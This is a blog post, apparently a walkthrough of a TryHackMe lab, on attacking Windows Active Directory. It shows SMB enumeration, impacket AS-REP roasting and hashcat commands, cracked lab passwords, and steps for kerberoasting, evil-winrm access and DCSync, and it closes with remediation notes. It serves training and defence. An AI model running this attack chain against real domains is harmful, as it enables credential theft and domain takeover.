OtoAbasi Ikott

Dec 31, 2021

4 min read

Pentesting Windows Active Directory

MITRE ATT&CK Mapping

Mitre Att&ch & Mapping.

Enumeration

nmap 10.10.43.224 -vv -Pn

nmap scan

nmap -sV 10.10.43.224 -vv -Pn

SMB share enumeration

smbclient -L \\\\10.10.84.141\\

We now grab all the text files

smb share enumeration

smbclient -\\\\10.10.84.141\\VulnNet-Business-Anonymous

ls

mget *

smb share enumeration

smbclient -\\\\10.10.84.141\\VulnNet-Enterprise-Anonymous

ls

mget *

smd share enumeration

smbmap -H 10.10.84.141 -u guest -p ‘ ‘

Because IPC$ Share is readable so we can enumerate valid domain users via impacket’s lookupsid.py

We can check the files (we can extract usernames from the text files but we can get usernames as well in a different way).

users enumeration results

We can use enumerate SID of the users (that’s because IPC$ is to set as READ) and we can use the impacket tool

Impact

The adversary is trying to manipulate, interrupt, or destroy your systems and data. Impact consists of techniques that…

attack.mitre.org

lookupsid.py guest@10.10.208.82

Performing AS-REP Roasting

If Kerberos pre-authentication is disabled on any of the above accounts, we can use the GetNPUsers from the impacket to send a request for authentication KDC which will then return a TGT that is encrypted with the user’s password.

Steal or Forge Kerberos Tickets: AS-REP Roasting

Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by Password Cracking…

attack.mitre.org

GetNPUsers.py -dc-ip 10.10.208.82 -usersfile /home/mic/Desktop/roasted/users.txt -no-pass vulnnet-rst.local/

impacket

Kerberos pre-authentication is disabled for the user t-skid and we have the hash so let crack it using the hashcat.

Cracking the KRB5 AS-REP hash using the hashcat

hashes

hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt

Identified creds:

  • username: t-skid
  • password: tj072889*

Performing Kerberoasting with t-skid’s credentials

Steal or Forge Kerberos Tickets: Kerberoasting

Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a…

attack.mitre.org

Because we have a valid credential we can perform kerberoasting to retrieve a KRB5 TGS hash.

kerberoarsting
hashing

Cracking the KRB5 TGS hash using the hashcat

hashes

Identified creds:

  • enterprise-core-vn
  • password: ry=ibfkfv,s6h,

We can log in now via evil-winrm.

evil winrm
net user enumeration
smbmap scan
smb shares enumeration

Creds hardcoded in a visual basic script

hardcoded creds
a-whitehat is a domain admin

Performing a DC Sync attack to get the Administrator hash (Privilege Escalation)

OS Credential Dumping: DCSync

Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's…

attack.mitre.org

We can perform a DCSync attack to get the administrator hash and login via EvilWinRM

dcsync
admin access

Vulnerabilities identified

  • SMB Null Session: Null sessions should be disabled, restricted, and monitored.
  • Kerberos pre-authentication should be enabled for all the user accounts.
  • Weak authentication credentials.

Finally, you can try something on your own here

https://tryhackme.com/room/vulnnetroasted

Information Technology
Infosecurity

--

--

More from OtoAbasi Ikott

Digital Resident

AboutHelpTermsPrivacy

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
OtoAbasi Ikott

OtoAbasi Ikott

3 Followers

Digital Resident

Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Text to speech